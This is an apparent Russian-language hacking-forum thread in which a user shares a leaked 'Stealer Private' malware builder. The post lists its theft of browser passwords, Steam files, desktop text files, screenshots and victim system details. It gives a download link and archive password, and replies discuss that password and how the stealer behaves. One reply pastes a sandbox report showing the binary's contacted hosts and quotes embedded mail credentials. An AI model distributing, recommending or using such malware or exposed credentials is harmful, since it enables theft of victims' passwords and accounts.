Stealer Private - [Builder c0d3d By PC-RET]

[DaRkMatRix]

(СЛИВ С ДРУГОГО ФОРУМА)
1) Кража паролей браузеров:
- Yandex Browser
- Xpom
- Amigo Browser
- Google Chrome
- Comodo
- Opera Software
- Mozilla Firefox
- Steam ssfn
- Steam config
2) Кража .txt файлов с рабочего стола.
3) Фотография рабочего стола жертвы.
4) Информация о компьютере жертвы:
- Время системы на момент отправки отчета
- Дата системы на момент отправки отчета
- Айпи системы с которой отправлен отчет
- Имя пользователя системы, который открыл стаб
- Диск на котором установлена система Windows
- Номер HDD в 16 ричном формате
- Архив в котором содержатся украденные данные
Сразу отмечу что на XP работа невозможна.
ССЫЛКА: https://yadi.sk/d/pVyho49i3EpUAA
pass:ha
VT:https://metadefender.opswat.com/results#!/file/ZTE3MDEyNkIxY3ZqNUp1dmdIa2pQanExT0R4/regular/overview

 

[Sweet Dreams]

Нигер, я тебя жду, мой милый! ^_^

 

[lev2016]

Какой пароль?

 

[Diakko]

1 Запуск стилера разовый или он потом висит в процессах и продолжает работать?
2 Отчёт формируется один раз или с заданной периодичностью?
3. Собираются только сохранённые пароли или вводимые тоже (после запуска)?

 

[nomanwho]

ссылка на VT

марасишь что ли.. какой ВТ..

 

[Joyckman]

марасишь что ли.. какой ВТ..

Он же на Билд сказал VT,а на стиллер....

 

[kirashinji]

Негр проверь плез

 

[lev2016]

Так,ну тему я уже нашел ) https://bhf.io/threads/380639/

 

[nomanwho]

че пароль не кто не подскажет ?

 

[DaRkMatRix]

че пароль не кто не подскажет ?

пароль ha

 

[DaRkMatRix]

1. Убери красный
2.Пароль
3.ссылка на VT

1)люблю красный
2)ПАРОЛЬ:ha
3)vt:https://metadefender.opswat.com/results#!/file/ZTE3MDEyNkIxY3ZqNUp1dmdIa2pQanExT0R4/regular/overview

 

[DaRkMatRix]

че пароль не кто не подскажет ?

pass:ha

 

[nomanwho]

пароль ha

'это не оригинал..оригинал всего 1.5 весит.
Found potential URL in binary/memory
details
Heuristic match: "command.com"
Heuristic match: "Stealer Private - [Builder c0d3d By PC-RET] | BHF.IO"
Heuristic match: "T$D(^ .lv"
Pattern match: "http://www.openssl.org/"
Heuristic match: "Visual Studio .NET"
Pattern match: "http://2ip.ru/"
Heuristic match: "[email protected]"
Heuristic match: "[email protected]"
Heuristic match: "n5|.com"
Heuristic match: "and.com"
source
String
relevance
10/10

Логин: [email protected]
Пароль: wallecs1

2ip.ru 178.63.151.224 - Germany
smtp.mail.ru 94.100.180.160 - Russian Federation
Contacted Hosts
Login to Download Contacted Hosts (CSV)
IP Address Port/Protocol Associated Process Details
178.63.151.224
OSINT 80
TCP release.exe
PID: 2472 Germany
ASN: 24940 (Hetzner Online AG)
94.100.180.160
OSINT 465
TCP release.exe
PID: 2472 Russian Federation

создает второй файл.
release.exe (PID: 2472)

з.ы. крайне! не советую пользовать

 

[DaRkMatRix]

'это не оригинал..оригинал всего 1.5 весит.
Found potential URL in binary/memory
details
Heuristic match: "command.com"
Heuristic match: "Stealer Private - [Builder c0d3d By PC-RET] | BHF.IO"
Heuristic match: "T$D(^ .lv"
Pattern match: "http://www.openssl.org/"
Heuristic match: "Visual Studio .NET"
Pattern match: "http://2ip.ru/"
Heuristic match: "[email protected]"
Heuristic match: "[email protected]"
Heuristic match: "n5|.com"
Heuristic match: "and.com"
source
String
relevance
10/10

Логин: [email protected]
Пароль: wallecs1

2ip.ru 178.63.151.224 - Germany
smtp.mail.ru 94.100.180.160 - Russian Federation
Contacted Hosts
Login to Download Contacted Hosts (CSV)
IP Address Port/Protocol Associated Process Details
178.63.151.224
OSINT 80
TCP release.exe
PID: 2472 Germany
ASN: 24940 (Hetzner Online AG)
94.100.180.160
OSINT 465
TCP release.exe
PID: 2472 Russian Federation

создает второй файл.
release.exe (PID: 2472)

з.ы. крайне! не советую пользовать

Я за прогу не ручаюсь ибо это слив

 

[nomanwho]

научи плиз)

учу!
https://www.reverse.it/ суй туда и смотри что покажет. или руками копай инструментов полно.

 

[Freiiidd]

Не пашет нихая